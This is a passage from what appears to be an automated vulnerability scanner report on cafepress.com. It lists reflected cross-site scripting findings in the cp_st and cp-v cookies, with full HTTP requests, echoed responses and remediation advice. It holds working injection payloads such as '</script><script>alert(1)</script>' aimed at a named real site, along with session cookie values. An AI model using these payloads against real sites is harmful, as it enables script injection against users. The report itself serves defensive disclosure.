The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0403</script><script>alert(1)</script>51550576faa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d0403</script><script>alert(1)</script>51550576faa ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 53764
Date: Sun, 26 Dec 2010 13:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'd0403</script><script>alert(1)</script>51550576faa '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stickers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 181d3"-alert(1)-"e0b5be905e5 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 55169
Date: Sun, 26 Dec 2010 13:48:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stickers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4548</script><script>alert(1)</script>1bf2219952e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a4548</script><script>alert(1)</script>1bf2219952e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55191
Date: Sun, 26 Dec 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'a4548</script><script>alert(1)</script>1bf2219952e '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stockings
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a524"-alert(1)-"630f88fb7a4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 52631
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stockings
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75fbc</script><script>alert(1)</script>3209aface0d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=75fbc</script><script>alert(1)</script>3209aface0d ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 52650
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '75fbc</script><script>alert(1)</script>3209aface0d '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-t-shirts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8dde"-alert(1)-"0740f775c1c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
